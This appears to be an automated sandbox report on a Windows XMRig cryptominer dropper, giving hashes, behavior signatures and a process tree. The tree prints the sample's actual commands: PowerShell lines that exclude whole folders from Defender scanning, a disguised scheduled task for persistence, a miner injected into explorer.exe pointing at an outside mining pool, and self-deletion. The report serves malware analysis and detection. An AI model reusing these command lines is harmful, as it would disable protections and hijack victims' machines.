Analysis
-
max time kernel
137s -
max time network
129s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
27-07-2021 00:01
Static task
static1
Behavioral task
behavioral1
Sample
cab63b06017beec8efd11d7f03ca5a85.exe
Resource
win7v20210410
General
-
Target
cab63b06017beec8efd11d7f03ca5a85.exe
-
Size
99KB
-
MD5
cab63b06017beec8efd11d7f03ca5a85
-
SHA1
4f252e828d51bfe8cf1322e6c18656a8a9b359e2
-
SHA256
cc6611635ca61701a1aa303698270f8e6d8de4f6fc5e6b3a11c5fa9cb1621972
-
SHA512
9011b9bed98b8474f59e78966d5c31d36348afb256cc3d0a8406beb8038c03cb4d44b72e2fa4fb6868c8242909d71fcbfdcd359f727b9962293240c563da80e4
Malware Config
Signatures
-
XMRig Miner Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/1536-466-0x0000000140000000-0x0000000140758000-memory.dmp xmrig behavioral2/memory/1536-467-0x00000001402EB66C-mapping.dmp xmrig behavioral2/memory/1536-473-0x0000000140000000-0x0000000140758000-memory.dmp xmrig -
Executes dropped EXE 4 IoCs
Processes:
svchost64.exesplwow64.exesvchost64.exesihost64.exepid process 2104 svchost64.exe 348 splwow64.exe 3956 svchost64.exe 3600 sihost64.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 5 IoCs
Processes:
svchost64.exesvchost64.exedescription ioc process File created C:\Windows\system32\Microsoft\Libs\sihost64.exe svchost64.exe File created C:\Windows\system32\Microsoft\Libs\WR64.sys svchost64.exe File created C:\Windows\system32\Microsoft\Libs\sihost64.log svchost64.exe File created C:\Windows\system32\splwow64.exe svchost64.exe File opened for modification C:\Windows\system32\splwow64.exe svchost64.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
svchost64.exedescription pid process target process PID 3956 set thread context of 1536 3956 svchost64.exe explorer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 3140 schtasks.exe 1596 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 26 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exesvchost64.exepowershell.exepowershell.exepowershell.exepowershell.exesvchost64.exepid process 2824 powershell.exe 2824 powershell.exe 2824 powershell.exe 2800 powershell.exe 2800 powershell.exe 2800 powershell.exe 2980 powershell.exe 2980 powershell.exe 2980 powershell.exe 1016 powershell.exe 1016 powershell.exe 1016 powershell.exe 2104 svchost64.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 2124 powershell.exe 2124 powershell.exe 2124 powershell.exe 1128 powershell.exe 1128 powershell.exe 1128 powershell.exe 2584 powershell.exe 2584 powershell.exe 2584 powershell.exe 3956 svchost64.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2824 powershell.exe Token: SeIncreaseQuotaPrivilege 2824 powershell.exe Token: SeSecurityPrivilege 2824 powershell.exe Token: SeTakeOwnershipPrivilege 2824 powershell.exe Token: SeLoadDriverPrivilege 2824 powershell.exe Token: SeSystemProfilePrivilege 2824 powershell.exe Token: SeSystemtimePrivilege 2824 powershell.exe Token: SeProfSingleProcessPrivilege 2824 powershell.exe Token: SeIncBasePriorityPrivilege 2824 powershell.exe Token: SeCreatePagefilePrivilege 2824 powershell.exe Token: SeBackupPrivilege 2824 powershell.exe Token: SeRestorePrivilege 2824 powershell.exe Token: SeShutdownPrivilege 2824 powershell.exe Token: SeDebugPrivilege 2824 powershell.exe Token: SeSystemEnvironmentPrivilege 2824 powershell.exe Token: SeRemoteShutdownPrivilege 2824 powershell.exe Token: SeUndockPrivilege 2824 powershell.exe Token: SeManageVolumePrivilege 2824 powershell.exe Token: 33 2824 powershell.exe Token: 34 2824 powershell.exe Token: 35 2824 powershell.exe Token: 36 2824 powershell.exe Token: SeDebugPrivilege 2800 powershell.exe Token: SeIncreaseQuotaPrivilege 2800 powershell.exe Token: SeSecurityPrivilege 2800 powershell.exe Token: SeTakeOwnershipPrivilege 2800 powershell.exe Token: SeLoadDriverPrivilege 2800 powershell.exe Token: SeSystemProfilePrivilege 2800 powershell.exe Token: SeSystemtimePrivilege 2800 powershell.exe Token: SeProfSingleProcessPrivilege 2800 powershell.exe Token: SeIncBasePriorityPrivilege 2800 powershell.exe Token: SeCreatePagefilePrivilege 2800 powershell.exe Token: SeBackupPrivilege 2800 powershell.exe Token: SeRestorePrivilege 2800 powershell.exe Token: SeShutdownPrivilege 2800 powershell.exe Token: SeDebugPrivilege 2800 powershell.exe Token: SeSystemEnvironmentPrivilege 2800 powershell.exe Token: SeRemoteShutdownPrivilege 2800 powershell.exe Token: SeUndockPrivilege 2800 powershell.exe Token: SeManageVolumePrivilege 2800 powershell.exe Token: 33 2800 powershell.exe Token: 34 2800 powershell.exe Token: 35 2800 powershell.exe Token: 36 2800 powershell.exe Token: SeDebugPrivilege 2980 powershell.exe Token: SeIncreaseQuotaPrivilege 2980 powershell.exe Token: SeSecurityPrivilege 2980 powershell.exe Token: SeTakeOwnershipPrivilege 2980 powershell.exe Token: SeLoadDriverPrivilege 2980 powershell.exe Token: SeSystemProfilePrivilege 2980 powershell.exe Token: SeSystemtimePrivilege 2980 powershell.exe Token: SeProfSingleProcessPrivilege 2980 powershell.exe Token: SeIncBasePriorityPrivilege 2980 powershell.exe Token: SeCreatePagefilePrivilege 2980 powershell.exe Token: SeBackupPrivilege 2980 powershell.exe Token: SeRestorePrivilege 2980 powershell.exe Token: SeShutdownPrivilege 2980 powershell.exe Token: SeDebugPrivilege 2980 powershell.exe Token: SeSystemEnvironmentPrivilege 2980 powershell.exe Token: SeRemoteShutdownPrivilege 2980 powershell.exe Token: SeUndockPrivilege 2980 powershell.exe Token: SeManageVolumePrivilege 2980 powershell.exe Token: 33 2980 powershell.exe Token: 34 2980 powershell.exe -
Suspicious use of WriteProcessMemory 63 IoCs
Processes:
cab63b06017beec8efd11d7f03ca5a85.execmd.execmd.exesvchost64.execmd.exesplwow64.execmd.execmd.execmd.exesvchost64.execmd.execmd.exedescription pid process target process PID 568 wrote to memory of 1536 568 cab63b06017beec8efd11d7f03ca5a85.exe cmd.exe PID 568 wrote to memory of 1536 568 cab63b06017beec8efd11d7f03ca5a85.exe cmd.exe PID 1536 wrote to memory of 2824 1536 cmd.exe powershell.exe PID 1536 wrote to memory of 2824 1536 cmd.exe powershell.exe PID 1536 wrote to memory of 2800 1536 cmd.exe powershell.exe PID 1536 wrote to memory of 2800 1536 cmd.exe powershell.exe PID 1536 wrote to memory of 2980 1536 cmd.exe powershell.exe PID 1536 wrote to memory of 2980 1536 cmd.exe powershell.exe PID 1536 wrote to memory of 1016 1536 cmd.exe powershell.exe PID 1536 wrote to memory of 1016 1536 cmd.exe powershell.exe PID 568 wrote to memory of 4040 568 cab63b06017beec8efd11d7f03ca5a85.exe cmd.exe PID 568 wrote to memory of 4040 568 cab63b06017beec8efd11d7f03ca5a85.exe cmd.exe PID 4040 wrote to memory of 2104 4040 cmd.exe svchost64.exe PID 4040 wrote to memory of 2104 4040 cmd.exe svchost64.exe PID 2104 wrote to memory of 3804 2104 svchost64.exe cmd.exe PID 2104 wrote to memory of 3804 2104 svchost64.exe cmd.exe PID 3804 wrote to memory of 3140 3804 cmd.exe schtasks.exe PID 3804 wrote to memory of 3140 3804 cmd.exe schtasks.exe PID 2104 wrote to memory of 348 2104 svchost64.exe splwow64.exe PID 2104 wrote to memory of 348 2104 svchost64.exe splwow64.exe PID 2104 wrote to memory of 3604 2104 svchost64.exe cmd.exe PID 2104 wrote to memory of 3604 2104 svchost64.exe cmd.exe PID 348 wrote to memory of 3380 348 splwow64.exe cmd.exe PID 348 wrote to memory of 3380 348 splwow64.exe cmd.exe PID 3380 wrote to memory of 3148 3380 cmd.exe powershell.exe PID 3380 wrote to memory of 3148 3380 cmd.exe powershell.exe PID 3604 wrote to memory of 2832 3604 cmd.exe choice.exe PID 3604 wrote to memory of 2832 3604 cmd.exe choice.exe PID 3380 wrote to memory of 2124 3380 cmd.exe powershell.exe PID 3380 wrote to memory of 2124 3380 cmd.exe powershell.exe PID 3380 wrote to memory of 1128 3380 cmd.exe powershell.exe PID 3380 wrote to memory of 1128 3380 cmd.exe powershell.exe PID 3380 wrote to memory of 2584 3380 cmd.exe powershell.exe PID 3380 wrote to memory of 2584 3380 cmd.exe powershell.exe PID 348 wrote to memory of 3860 348 splwow64.exe cmd.exe PID 348 wrote to memory of 3860 348 splwow64.exe cmd.exe PID 3860 wrote to memory of 3956 3860 cmd.exe svchost64.exe PID 3860 wrote to memory of 3956 3860 cmd.exe svchost64.exe PID 3956 wrote to memory of 564 3956 svchost64.exe cmd.exe PID 3956 wrote to memory of 564 3956 svchost64.exe cmd.exe PID 3956 wrote to memory of 3600 3956 svchost64.exe sihost64.exe PID 3956 wrote to memory of 3600 3956 svchost64.exe sihost64.exe PID 564 wrote to memory of 1596 564 cmd.exe schtasks.exe PID 564 wrote to memory of 1596 564 cmd.exe schtasks.exe PID 3956 wrote to memory of 1536 3956 svchost64.exe explorer.exe PID 3956 wrote to memory of 1536 3956 svchost64.exe explorer.exe PID 3956 wrote to memory of 1536 3956 svchost64.exe explorer.exe PID 3956 wrote to memory of 1536 3956 svchost64.exe explorer.exe PID 3956 wrote to memory of 1536 3956 svchost64.exe explorer.exe PID 3956 wrote to memory of 1536 3956 svchost64.exe explorer.exe PID 3956 wrote to memory of 1536 3956 svchost64.exe explorer.exe PID 3956 wrote to memory of 1536 3956 svchost64.exe explorer.exe PID 3956 wrote to memory of 1536 3956 svchost64.exe explorer.exe PID 3956 wrote to memory of 1536 3956 svchost64.exe explorer.exe PID 3956 wrote to memory of 1536 3956 svchost64.exe explorer.exe PID 3956 wrote to memory of 1536 3956 svchost64.exe explorer.exe PID 3956 wrote to memory of 1536 3956 svchost64.exe explorer.exe PID 3956 wrote to memory of 1536 3956 svchost64.exe explorer.exe PID 3956 wrote to memory of 1536 3956 svchost64.exe explorer.exe PID 3956 wrote to memory of 2304 3956 svchost64.exe cmd.exe PID 3956 wrote to memory of 2304 3956 svchost64.exe cmd.exe PID 2304 wrote to memory of 1764 2304 cmd.exe choice.exe PID 2304 wrote to memory of 1764 2304 cmd.exe choice.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\cab63b06017beec8efd11d7f03ca5a85.exe"C:\Users\Admin\AppData\Local\Temp\cab63b06017beec8efd11d7f03ca5a85.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\cab63b06017beec8efd11d7f03ca5a85.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\svchost64.exeC:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\cab63b06017beec8efd11d7f03ca5a85.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "splwow64" /tr '"C:\Windows\system32\splwow64.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "splwow64" /tr '"C:\Windows\system32\splwow64.exe"'5⤵
- Creates scheduled task(s)
-
C:\Windows\system32\splwow64.exe"C:\Windows\system32\splwow64.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'6⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'6⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'6⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'6⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\splwow64.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\svchost64.exeC:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\splwow64.exe"6⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "splwow64" /tr '"C:\Windows\system32\splwow64.exe"' & exit7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "splwow64" /tr '"C:\Windows\system32\splwow64.exe"'8⤵
- Creates scheduled task(s)
-
C:\Windows\system32\Microsoft\Libs\sihost64.exe"C:\Windows\system32\Microsoft\Libs\sihost64.exe"7⤵
- Executes dropped EXE
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --donate-level=1 --url=cryptolegion.ddns.net --user={COMPUTERNAME}/LEGION --pass={COMPUTERNAME}/LEGION --cpu-max-threads-hint=20 --cinit-idle-wait=5 --cinit-idle-cpu=80 --nicehash --cinit-stealth7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 38⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 35⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
ad5cd538ca58cb28ede39c108acb5785
SHA11ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost64.exe.logMD5
84f2160705ac9a032c002f966498ef74
SHA1e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
SHA2567840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
SHA512f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
85bc5686303b9407e337d2e7ed318822
SHA1a3bbbf919888467336b871faa5d1ec8d27511ea5
SHA25642d5e88dd1e7f20b83f18ee85b25cde3e5f762d6c013f54aba5c416f5546e4aa
SHA512f27b268318d572b2f58152553c1aade7e49af74599ae4ad7ba3a4a09db88fd6f94748c90947fa342c35c1acd097746ffc3a6b6a1b7371be935e2dba5fd522a3a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
88713cc2628823f20808d2b59e8d64d8
SHA1eb40da5682b2bfc9cb02241d6c00c150b09d00e0
SHA256d1c10a1f9e863bbba48c5b5109364c0623506029c511bc382d2ec311aa6ec205
SHA5127ec8388ccce2ad4ef9bf2344202662b1d9f902a3abdea8a28de81f2ddf88afeb32ebedcdfc54d86e2c161b2eeaacfbe86af38ca7da47da8ab99a787550387658
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
756707b373b08e72d5c2d27028e36755
SHA13434eefa55322fe2c679003c233c37c581c658b7
SHA256107430b98b5db520ff623e939cc3a40b0c9aca43faee814c9107cb479cfdf22e
SHA5129e8f844abda899b5d6878e8e6fd60d27cc0cdf8aa1dce60e47f9a1b5d80c75648a48a967407e45d2531d376132718fefbbafc2d2614f4bb9c656a9cffc9666cd
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
19b8b3cfbfe4a1e42d544ca6710e0cd1
SHA17442173078cdec084e3dd7fb8575ebac9a4395cc
SHA256933216153ad5bbd1386b9d8186db857828bf700e3f4a990df767ca763fe34bef
SHA512cf13979c4df6bfe50144b0b4011c8060ab3c9128dce6fcb57d0afaf76cb693b59950fdc343e5e49c7a0007976fb6d8f1070244c3098bf63c3eb0da601d86263e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
9348a3211d5fab2c8b4e3e1a942c7120
SHA155144051106e59baea3e24a949b32b7e06a5d8e7
SHA256bfdcc8847d1e583e3f8b99f7aa478bf138c494167becae153a41909407442e80
SHA512ec88b68ada061e0c34196c74e502971fd2718ed438fc84fa5edd4353d6b1f80c26f0345e05daaa5b4fdedd5d0c16bf41c74a060605d252ec7ab74131bfb035af
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
783a0c7588a2b28066fc5df2c09c0f36
SHA1d8ed0da384582cfb54bee1e5092478220125447e
SHA25600f6d245722a04bda18091a69fd8d611540e201ee7adaa8f08284aa57554cd20
SHA512b88dc195164a6827a21e1c678e4909b5051a58bc3d16d91f1c79669c92afa093dde6da48e54efe181d01f4903ea199a064a9380d41636cb169786d02f87b3dc5
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
e0da2b7600d89de73e583740dd2d25e2
SHA14a9c54dc9718baf29a97ec07e89a7eaf43cb7fbb
SHA25604edb0e169a462634a82098acb39301fe2517c699852900a86b9cd9d8f769464
SHA512333ff2dde7c8ed8fc77e3fb420429189d9b904d9d5f0575013ebf6a55c6d12ef84c5ef7289b7ad28f1f927646b8cef701fb0653bf5c8894d8b2f1b79af04228c
-
C:\Users\Admin\AppData\Local\Temp\svchost64.exeMD5
b97dba5ec3906d3b681efdf92b78a4d7
SHA1b90192a2281ba8c2f91097e8abdbab4238a1bd84
SHA25694d81c37666beed9fda950adfe53c554116c45be7eabfcd42b9f5b1feaefbc7f
SHA512ba1d43f0f7e89769c422a879a2836405e3898b1ac18b78309bec835f31096b1643dfaa33d3cab3d7259806705971d78226752d3f3a885663b635d17cbef7e05a
-
C:\Users\Admin\AppData\Local\Temp\svchost64.exeMD5
b97dba5ec3906d3b681efdf92b78a4d7
SHA1b90192a2281ba8c2f91097e8abdbab4238a1bd84
SHA25694d81c37666beed9fda950adfe53c554116c45be7eabfcd42b9f5b1feaefbc7f
SHA512ba1d43f0f7e89769c422a879a2836405e3898b1ac18b78309bec835f31096b1643dfaa33d3cab3d7259806705971d78226752d3f3a885663b635d17cbef7e05a
-
C:\Users\Admin\AppData\Local\Temp\svchost64.exeMD5
b97dba5ec3906d3b681efdf92b78a4d7
SHA1b90192a2281ba8c2f91097e8abdbab4238a1bd84
SHA25694d81c37666beed9fda950adfe53c554116c45be7eabfcd42b9f5b1feaefbc7f
SHA512ba1d43f0f7e89769c422a879a2836405e3898b1ac18b78309bec835f31096b1643dfaa33d3cab3d7259806705971d78226752d3f3a885663b635d17cbef7e05a
-
C:\Users\Admin\AppData\Local\Temp\svchost64.exeMD5
b97dba5ec3906d3b681efdf92b78a4d7
SHA1b90192a2281ba8c2f91097e8abdbab4238a1bd84
SHA25694d81c37666beed9fda950adfe53c554116c45be7eabfcd42b9f5b1feaefbc7f
SHA512ba1d43f0f7e89769c422a879a2836405e3898b1ac18b78309bec835f31096b1643dfaa33d3cab3d7259806705971d78226752d3f3a885663b635d17cbef7e05a
-
C:\Windows\System32\Microsoft\Libs\sihost64.exeMD5
1a39ac13bc88ad7d21e874535107fe83
SHA1a0c88f578af5bed2d873eba3a32b0b712b41f4ae
SHA25625a04f0d47b9c7235412cf56fd1fd74b4bd4fd332abf64a3cdc656f99748ae55
SHA5125d2141bf03aa17c927f7fc6a97d0a36e79af6372b10826d491af31f79b2267b57a02eda258c4ce3a50a322384cde5970ae74ae146bc550939dce90e1cf34e0c1
-
C:\Windows\System32\splwow64.exeMD5
cab63b06017beec8efd11d7f03ca5a85
SHA14f252e828d51bfe8cf1322e6c18656a8a9b359e2
SHA256cc6611635ca61701a1aa303698270f8e6d8de4f6fc5e6b3a11c5fa9cb1621972
SHA5129011b9bed98b8474f59e78966d5c31d36348afb256cc3d0a8406beb8038c03cb4d44b72e2fa4fb6868c8242909d71fcbfdcd359f727b9962293240c563da80e4
-
C:\Windows\system32\Microsoft\Libs\sihost64.exeMD5
1a39ac13bc88ad7d21e874535107fe83
SHA1a0c88f578af5bed2d873eba3a32b0b712b41f4ae
SHA25625a04f0d47b9c7235412cf56fd1fd74b4bd4fd332abf64a3cdc656f99748ae55
SHA5125d2141bf03aa17c927f7fc6a97d0a36e79af6372b10826d491af31f79b2267b57a02eda258c4ce3a50a322384cde5970ae74ae146bc550939dce90e1cf34e0c1
-
C:\Windows\system32\splwow64.exeMD5
cab63b06017beec8efd11d7f03ca5a85
SHA14f252e828d51bfe8cf1322e6c18656a8a9b359e2
SHA256cc6611635ca61701a1aa303698270f8e6d8de4f6fc5e6b3a11c5fa9cb1621972
SHA5129011b9bed98b8474f59e78966d5c31d36348afb256cc3d0a8406beb8038c03cb4d44b72e2fa4fb6868c8242909d71fcbfdcd359f727b9962293240c563da80e4
-
memory/348-304-0x0000000002E60000-0x0000000002E62000-memory.dmpFilesize
8KB
-
memory/348-284-0x0000000000000000-mapping.dmp
-
memory/564-458-0x0000000000000000-mapping.dmp
-
memory/568-114-0x0000000000320000-0x0000000000321000-memory.dmpFilesize
4KB
-
memory/568-116-0x000000001C060000-0x000000001C062000-memory.dmpFilesize
8KB
-
memory/1016-246-0x0000024274E93000-0x0000024274E95000-memory.dmpFilesize
8KB
-
memory/1016-245-0x0000024274E90000-0x0000024274E92000-memory.dmpFilesize
8KB
-
memory/1016-233-0x0000000000000000-mapping.dmp
-
memory/1016-272-0x0000024274E96000-0x0000024274E98000-memory.dmpFilesize
8KB
-
memory/1016-273-0x0000024274E98000-0x0000024274E99000-memory.dmpFilesize
4KB
-
memory/1128-382-0x0000024D03343000-0x0000024D03345000-memory.dmpFilesize
8KB
-
memory/1128-417-0x0000024D03348000-0x0000024D03349000-memory.dmpFilesize
4KB
-
memory/1128-415-0x0000024D03346000-0x0000024D03348000-memory.dmpFilesize
8KB
-
memory/1128-381-0x0000024D03340000-0x0000024D03342000-memory.dmpFilesize
8KB
-
memory/1128-369-0x0000000000000000-mapping.dmp
-
memory/1536-477-0x00000000020D0000-0x00000000020F0000-memory.dmpFilesize
128KB
-
memory/1536-475-0x00000000020B0000-0x00000000020D0000-memory.dmpFilesize
128KB
-
memory/1536-476-0x00000000020B0000-0x00000000020D0000-memory.dmpFilesize
128KB
-
memory/1536-466-0x0000000140000000-0x0000000140758000-memory.dmpFilesize
7.3MB
-
memory/1536-117-0x0000000000000000-mapping.dmp
-
memory/1536-467-0x00000001402EB66C-mapping.dmp
-
memory/1536-469-0x00000000004E0000-0x0000000000500000-memory.dmpFilesize
128KB
-
memory/1536-473-0x0000000140000000-0x0000000140758000-memory.dmpFilesize
7.3MB
-
memory/1536-474-0x0000000002090000-0x00000000020B0000-memory.dmpFilesize
128KB
-
memory/1596-463-0x0000000000000000-mapping.dmp
-
memory/1764-472-0x0000000000000000-mapping.dmp
-
memory/2104-275-0x0000000000000000-mapping.dmp
-
memory/2104-281-0x0000000003B40000-0x0000000003B42000-memory.dmpFilesize
8KB
-
memory/2104-278-0x0000000000FA0000-0x0000000000FA1000-memory.dmpFilesize
4KB
-
memory/2104-280-0x00000000018B0000-0x00000000018B1000-memory.dmpFilesize
4KB
-
memory/2124-344-0x000001DD3F4C0000-0x000001DD3F4C2000-memory.dmpFilesize
8KB
-
memory/2124-331-0x0000000000000000-mapping.dmp
-
memory/2124-378-0x000001DD3F4C6000-0x000001DD3F4C8000-memory.dmpFilesize
8KB
-
memory/2124-345-0x000001DD3F4C3000-0x000001DD3F4C5000-memory.dmpFilesize
8KB
-
memory/2124-380-0x000001DD3F4C8000-0x000001DD3F4C9000-memory.dmpFilesize
4KB
-
memory/2304-468-0x0000000000000000-mapping.dmp
-
memory/2584-448-0x00000189DC6D8000-0x00000189DC6D9000-memory.dmpFilesize
4KB
-
memory/2584-446-0x00000189DC6D6000-0x00000189DC6D8000-memory.dmpFilesize
8KB
-
memory/2584-420-0x00000189DC6D3000-0x00000189DC6D5000-memory.dmpFilesize
8KB
-
memory/2584-419-0x00000189DC6D0000-0x00000189DC6D2000-memory.dmpFilesize
8KB
-
memory/2584-408-0x0000000000000000-mapping.dmp
-
memory/2800-173-0x0000028CEC963000-0x0000028CEC965000-memory.dmpFilesize
8KB
-
memory/2800-155-0x0000000000000000-mapping.dmp
-
memory/2800-171-0x0000028CEC960000-0x0000028CEC962000-memory.dmpFilesize
8KB
-
memory/2800-176-0x0000028CEC966000-0x0000028CEC968000-memory.dmpFilesize
8KB
-
memory/2800-207-0x0000028CEC968000-0x0000028CEC969000-memory.dmpFilesize
4KB
-
memory/2824-147-0x0000021EEB0C6000-0x0000021EEB0C8000-memory.dmpFilesize
8KB
-
memory/2824-128-0x0000021EEB0C3000-0x0000021EEB0C5000-memory.dmpFilesize
8KB
-
memory/2824-127-0x0000021EEB0C0000-0x0000021EEB0C2000-memory.dmpFilesize
8KB
-
memory/2824-126-0x0000021EEB5A0000-0x0000021EEB5A1000-memory.dmpFilesize
4KB
-
memory/2824-123-0x0000021EEB2E0000-0x0000021EEB2E1000-memory.dmpFilesize
4KB
-
memory/2824-169-0x0000021EEB0C8000-0x0000021EEB0C9000-memory.dmpFilesize
4KB
-
memory/2824-118-0x0000000000000000-mapping.dmp
-
memory/2832-292-0x0000000000000000-mapping.dmp
-
memory/2980-243-0x00000193F8376000-0x00000193F8378000-memory.dmpFilesize
8KB
-
memory/2980-195-0x0000000000000000-mapping.dmp
-
memory/2980-209-0x00000193F8373000-0x00000193F8375000-memory.dmpFilesize
8KB
-
memory/2980-208-0x00000193F8370000-0x00000193F8372000-memory.dmpFilesize
8KB
-
memory/2980-244-0x00000193F8378000-0x00000193F8379000-memory.dmpFilesize
4KB
-
memory/3140-283-0x0000000000000000-mapping.dmp
-
memory/3148-291-0x0000000000000000-mapping.dmp
-
memory/3148-305-0x00000172BEC86000-0x00000172BEC88000-memory.dmpFilesize
8KB
-
memory/3148-342-0x00000172BEC88000-0x00000172BEC89000-memory.dmpFilesize
4KB
-
memory/3148-306-0x00000172BEC80000-0x00000172BEC82000-memory.dmpFilesize
8KB
-
memory/3148-307-0x00000172BEC83000-0x00000172BEC85000-memory.dmpFilesize
8KB
-
memory/3380-290-0x0000000000000000-mapping.dmp
-
memory/3600-459-0x0000000000000000-mapping.dmp
-
